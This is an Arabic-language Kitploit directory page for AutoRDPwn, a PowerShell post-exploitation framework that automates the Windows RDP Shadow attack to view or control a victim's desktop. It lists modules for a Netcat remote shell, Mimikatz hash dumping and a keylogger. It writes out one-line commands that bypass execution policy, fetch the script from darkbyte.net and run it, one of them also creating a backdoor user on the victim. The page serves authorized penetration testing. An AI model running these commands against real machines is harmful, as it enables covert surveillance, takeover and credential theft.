Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/joelgmsec/autordpwn
كسر كلمات المرورتصعيد الامتيازاتتوليد الحمولةالحركة الجانبيةما بعد الاستغلالاختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubjoelgmsec/autordpwn

AutoRDPwn

إطار هجوم الظل

عرض المستودع
1.1k499منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

AutoRDPwn

AutoRDPwn هو إطار عمل لمرحلة ما بعد الاستغلال تم إنشاؤه بلغة Powershell، مصمم بشكل أساسي لأتمتة هجوم Shadow على أجهزة الكمبيوتر التي تعمل بنظام Microsoft Windows. تسمح هذه الثغرة (المدرجة كميزة من قبل Microsoft) للمهاجم عن بُعد بمشاهدة سطح المكتب للضحية دون موافقته، وحتى التحكم فيه عند الطلب، باستخدام أدوات أصلية من نظام التشغيل نفسه.

بفضل الوحدات الإضافية، يمكن الحصول على شل عن بُعد عبر Netcat، وتفريغ هاشات النظام باستخدام Mimikatz، وتحميل مسجل مفاتيح عن بُعد، وأكثر من ذلك بكثير. كل هذا من خلال قائمة سهلة تمامًا بسبع لغات مختلفة.

بالإضافة إلى ذلك، يمكن استخدامه في شل عكسي من خلال سلسلة من المعاملات الموضحة في قسم الاستخدام.

المتطلبات

Powershell 4.0 أو أعلى

التغييرات

الإصدار 5.1

• تم إصلاح العديد من الأخطاء

• تحسينات جمالية وتحسين أوقات الانتظار

• اتصال وكيل-aware من خلال إعدادات النظام

• أصبح من الممكن الآن استخدام الأداة دون اتصال عن طريق تنزيل الملف المضغوط .zip

• اكتشاف اللغة تلقائيًا بالضغط على مفتاح Enter

• تم استبدال Invoke-DCOM بـ SharpRDP

• تم استبدال PowerUp بـ Invoke-PrivescCheck

• إنشاء روتين التنظيف التلقائي على جهاز الضحية

• وحدة جديدة متاحة: SMB Shell مشفر باستخدام AES

• وحدة جديدة متاحة: تغيير المستخدم باستخدام RunAs

*يمكن الاطلاع على باقي التغييرات في ملف CHANGELOG

الاستخدام

يمكن استخدام هذا التطبيق محليًا أو عن بُعد أو للتنقل بين الفرق.

عند استخدامه عن بُعد في شل عكسي، من الضروري استخدام المعاملات التالية:

التنفيذ المحلي في سطر واحد:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

مثال على التنفيذ عن بُعد في سطر واحد:

root@kitploit:~
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

يمكن العثور على الدليل المفصل للاستخدام على الرابط التالي:

https://darkbyte.net/autordpwn-la-guia-definitiva

لقطات الشاشة

AutoRDPwn1_en AutoRDPwn2_en

الترخيص

هذا المشروع مرخص بموجب ترخيص GNU 3.0 - راجع ملف LICENSE للمزيد من التفاصيل.

الشكر والتقدير

تم إنشاء وتصميم هذا الإطار من الصفر بواسطة Joel Gámez Molina // @JoelGMSec

تستخدم بعض الوحدات كودًا ونصوصًا وأدوات من طرف ثالث، وعلى وجه الخصوص:

• Chachi-Enumerator بواسطة Luis Vacas --> https://github.com/Hackplayers/PsCabesha-tools

• Invoke-Phant0m بواسطة Halil Dalabasmaz --> https://github.com/hlldz/Invoke-Phant0m

• Invoke-PowerShellTcp بواسطة Nikhil "SamratAshok" Mittal --> https://github.com/samratashok/nishang

• Invoke-TheHash بواسطة Kevin Robertson --> https://github.com/Kevin-Robertson/Invoke-TheHash

• Mimikatz بواسطة Benjamin Delpy --> https://github.com/gentilkiwi/mimikatz

• PsExec بواسطة Mark Russinovich --> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

• RDP Wrapper بواسطة Stas'M Corp. --> https://github.com/stascorp/rdpwrap

• SharpRDP بواسطة Steven F --> https://github.com/0xthirteen/SharpRDP

والعديد غيرهم ممن لا يسعنا ذكرهم هنا.. شكرًا لجميعهم على عملهم الممتاز.

الاتصال

لا يقدم هذا البرنامج أي نوع من الضمان. استخدامه حصري للبيئات التعليمية و/أو تدقيقات الأمان بموافقة العميل المناسبة. لست مسؤولاً عن سوء استخدامه أو أي ضرر محتمل ينجم عنه.

لمزيد من المعلومات، يمكنك العثور علي على Twitter باسم @JoelGMSec وعلى مدونتي darkbyte.net.

الدعم

يمكنك دعم عملي بشراء فنجان قهوة لي:

buymeacoffe

تنزيل الأداة
المعاملالوصف
-admin / -noadminبناءً على الصلاحيات المتاحة، سنستخدم أحدهما أو الآخر
-noguiهذا سيتجنب تحميل القائمة وبعض الألوان، مع ضمان وظيفته
-langسنختار لغتنا (الإنجليزية، الإسبانية، الفرنسية، الألمانية، الإيطالية، الروسية أو البرتغالية)
-optionكما هو الحال مع القائمة، يمكننا اختيار كيفية إطلاق الهجوم
-shadowسنقرر ما إذا كنا نريد رؤية الجهاز البعيد أو التحكم فيه
-createuserهذا المعامل اختياري، سيتم إنشاء المستخدم AutoRDPwn:AutoRDPwn على جهاز الضحية
-nocleanيعطل عملية التراجع عن جميع التغييرات على كمبيوتر الضحية